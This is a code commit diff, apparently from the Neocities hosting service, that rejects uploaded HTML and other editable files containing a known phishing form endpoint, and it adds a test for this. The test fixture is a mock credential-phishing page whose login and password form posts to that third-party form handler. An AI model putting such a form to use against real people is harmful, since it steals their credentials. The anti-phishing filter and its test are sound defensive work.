prohibit third-party form sites that are almost exclusively used for phishing

models/site.rb

@@ -68,6 +68,7 @@ class Site < Sequel::Model
     /PHP\.Hide/
   ]
 
+  PHISHING_FORM_REGEX = /www.formbuddy.com\/cgi-bin\/form.pl/i
   SPAM_MATCH_REGEX = ENV['RACK_ENV'] == 'test' ? /pillz/ : /#{$config['spam_smart_filter'].join('|')}/i
   EMAIL_SANITY_REGEX = /.+@.+\..+/i
   EDITABLE_FILE_EXT = /html|htm|txt|js|css|md|manifest/i
@@ -481,9 +482,20 @@ class Site < Sequel::Model
 
   def okay_to_upload?(uploaded_file)
     return true if [:supporter].include?(plan_type.to_sym)
+    return false if self.class.possible_phishing?(uploaded_file)
     self.class.valid_file_type?(uploaded_file)
   end
 
+  def self.possible_phishing?(uploaded_file)
+    if File.extname(uploaded_file[:filename]).match EDITABLE_FILE_EXT
+      open(uploaded_file[:tempfile].path, 'r:binary') {|f|
+        matches = f.grep PHISHING_FORM_REGEX
+        return true unless matches.empty?
+      }
+    end
+    false
+  end
+
   def self.valid_file_type?(uploaded_file)
     mime_type = Magic.guess_file_mime_type uploaded_file[:tempfile].path
     extname = File.extname uploaded_file[:filename]
@@ -540,27 +552,6 @@ class Site < Sequel::Model
       return false
     end
 
-    if pathname.extname.match EDITABLE_FILE_EXT
-      open(uploaded.path, 'r:binary') {|f|
-        matches = f.grep SPAM_MATCH_REGEX
-
-        if !matches.empty?
-=begin
-          EmailWorker.perform_async({
-            from: 'web@neocities.org',
-            reply_to: email,
-            to: 'spam@neocities.org',
-            subject: "[Neocities SPAM]: #{username}",
-            body: %{
-              #{username}
-              https://#{self.host}/#{relative_path}
-            }
-          })
-=end
-        end
-      }
-    end
-
     if relative_path == 'index.html' && opts[:new_install] != true
       begin
         new_title = Nokogiri::HTML(File.read(uploaded.path)).css('title').first.text

tests/files/phishing.html

@@ -0,0 +1,41 @@
+<html>
+<head>
+<title>Phishing attack that only works on complete idiots that deserve to get hacked</title>
+</head>
+<body>
+<left>
+<h3>DU HAST MICH GIVE THIS RANDOM WEB SITE YOUR LOGIN CREDENTIALS DERRRRP</h3>
+
+<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
+<input type="hidden" name="username" value="germanslol">
+<input type="hidden" name="reqd" value="0">
+<input type="hidden" name="url" value="https://blahblah.com/owa/">
+
+
+<table border="0">
+<tr>
+<td align="right"><b>DU:</b>
+<td><input type="text" name="gebruikersnaam" size="36" maxlength="100">
+</tr>
+<tr>
+<td align="right"><b>E-Mail:</b>
+<td><input type="text" name="e-mail" size="36" maxlength="100">
+</tr>
+<tr>
+<td align="right"><b>HAST:</b>
+<td><input type="wachtwoord" name="wachtwoord" size="36" maxlength="100">
+</tr>
+<tr>
+<td align="right"><b>MICH:</b>
+<td><input type="Password" name="bevestig wachtwoord" size="36" maxlength="100">
+</tr>
+</table>
+
+
+<p><input type="submit" value="Submit"><input type="reset" value="Reset">
+</form>
+
+
+</Left>
+</body>
+</html>

tests/site_file_tests.rb

@@ -48,6 +48,11 @@ describe 'site_files' do
   end
 
   describe 'upload' do
+    it 'fails for suspected phishing' do
+      upload 'files[]' => Rack::Test::UploadedFile.new('./tests/files/phishing.html', 'text/html')
+      File.exists?(@site.files_path('phishing.html')).must_equal false
+    end
+
     it 'works with empty files' do
       upload 'files[]' => Rack::Test::UploadedFile.new('./tests/files/empty.js', 'text/javascript')
       File.exists?(@site.files_path('empty.js')).must_equal true